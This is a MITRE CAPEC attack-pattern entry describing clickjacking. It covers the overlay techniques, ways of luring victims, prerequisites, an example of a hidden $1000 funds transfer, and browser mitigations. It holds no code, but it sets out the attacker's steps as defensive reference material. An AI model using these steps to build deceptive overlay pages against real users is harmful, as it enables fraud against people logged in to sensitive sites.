In a clickjacking attack the victim is tricked into unknowingly initiating
some action in one system while interacting with the UI from seemingly
completely different system. While being logged in to some target system,
the victim visits the attacker's malicious site which displays a UI that the
victim wishes to interact with. In reality, the clickjacked page has a
transparent layer above the visible UI with action controls that the
attacker wishes the victim to execute. The victim clicks on buttons or other
UI elements they see on the page which actually triggers the action controls
in the transparent overlaying layer. Depending on what that action control
is, the attacker may have just tricked the victim into executing some
potentially privileged (and most certainly undesired) functionality in the
target system to which the victim is authenticated. The basic problem here
is that there is a dichotomy between what the victim thinks he's clicking on
versus what he or she is actually clicking on.
Attack Execution Flow
Experiment
Craft a clickjacking
page:
The attacker utilizes web page layering techniques
to try to craft a malicious clickjacking page
Attack Step Techniques
ID
Attack Step Technique Description
Environments
1
The attacker leveraged iFrame overlay
capabilities to craft a malicious clickjacking
page
env-Web
2
The attacker leveraged Flash file overlay
capabilities to craft a malicious clickjacking
page
env-Web
3
The attacker leveraged Silverlight overlay
capabilities to craft a malicious clickjacking
page
env-Web
4
The attacker leveraged cross-frame scripting
to craft a malicious clickjacking page
env-Web
Indicators
ID
type
Indicator Description
Environments
1
Positive
Overlay capabilities are enabled in the
browser
env-Web
Outcomes
ID
type
Outcome Description
1
Success
A page is created that performs
unseen actions when the user interacts with the
visible UI
Security Controls
ID
type
Security Control Description
1
Preventative
Disable overlay
functionality in the browser. This can have
obvious impact on the utility of the browser with
some sites and web
applications.
Exploit
Attacker lures victim to clickjacking
page:
Attacker utilizes some form of temptation,
misdirection or coercion to lure the victim to
loading and interacting with the clickjacking pagen
a way that increases the chances that the victim
will click in the right areas.
Attack Step Techniques
ID
Attack Step Technique Description
Environments
1
Lure the victim to the malicious site by
sending the victim an e-mail with a URL to the
site.
env-Web
2
Lure the victim to the malicious site by
manipulating URLs on a site trusted by the
victim.
env-Web
3
Lure the victim to the malicious site
through a cross-site scripting attack.
env-Web
Outcomes
ID
type
Outcome Description
1
Success
The victim loads the
clickjacking page.
Trick victim into interacting with the
clickjacking page in the desired
manner:
The attacker tricks the victim into clicking on
the areas of the UI which contain the hidden action
controls and thereby interacts with the target
system maliciously with the victim's level of
privilege.
Attack Step Techniques
ID
Attack Step Technique Description
Environments
1
Hide action controls over very commonly used
functionality.
env-Web
2
Hide action controls over very
psychologically tempting content.
env-Web
Attack Prerequisites
The victim is communicating with the target application via a web based UI
and not a thick client
The victim's browser security policies allow at least one of the following
JavaScript, Flash, iFrames, ActiveX, or CSS.
The victim uses a modern browser that supports UI elements like clickable
buttons (i.e. not using an old text only browser)
The victim has an active session with the target system.
The target system's interaction window is open in the victim's browser and
supports the ability for initiating sensitive actions on behalf of the user
in the target system
Typical Likelihood of Exploit
Likelihood: Medium
Methods of Attack
Spoofing
Social Engineering
Examples-Instances
Description
A victim has an authenticated session with a site that provides an
electronic payment service to transfer funds between subscribing
members. At the same time, the victim receives an e-mail that appears to
come from an online publication to which he or she subscribes with links
to today's news articles. The victim clicks on one of these links and is
taken to a page with the news story. There is a screen with an
advertisement that appears on top of the news article with the 'skip
this ad' button. Eager to read the news article, the user clicks on this
button. Nothing happens. The user clicks on the button one more time and
still nothing happens.
In reality, the victim activated a hidden action control located in a
transparent layer above the 'skip this ad' button. The ad screen
blocking the news article made it likely that the victim would click on
the 'skip this ad' button. Clicking on the button, actually initiated
the transfer of $1000 from the victim's account with an electronic
payment service to an attacker's account. Clicking on the 'skip this ad'
button the second time (after nothing seemingly happened the first time)
confirmed the transfer of funds to the elctronic payment service.
Attacker Skills or Knowledge Required
Skill or Knowledge Level: High
Crafting the proper malicious site and luring the victim to this site
are not trivial tasks.
Resources Required
Low: A computer connected to the internet.
Solutions and Mitigations
If using the Firefox browser, use the NoScript plug-in that will help
forbid iFrames.
Turn off JavaScript, Flash and disable CSS.
When maintaining an authenticated session with a privileged target system,
do not use the same browser to navigate to unfamiliar sites to perform other
activities. Finish working with the target system and logout first before
proceeding to other tasks.
Enforce maximum security restrictions in the browser: JavaScript disabled,
Flash disabled, CSS disabled, iFrames forbidden
Related Security Principles
Shed elevated privileges as soon as possible (i.e. log out of the target
application once finished with it and before doing other things in the
browser)
Vision and Technical Leadership provided by Cigital, Inc.
This Web site is hosted by The MITRE Corporation.
Copyright 2009, The MITRE Corporation. CAPEC and the CAPEC logo are trademarks of The MITRE Corporation.
Description
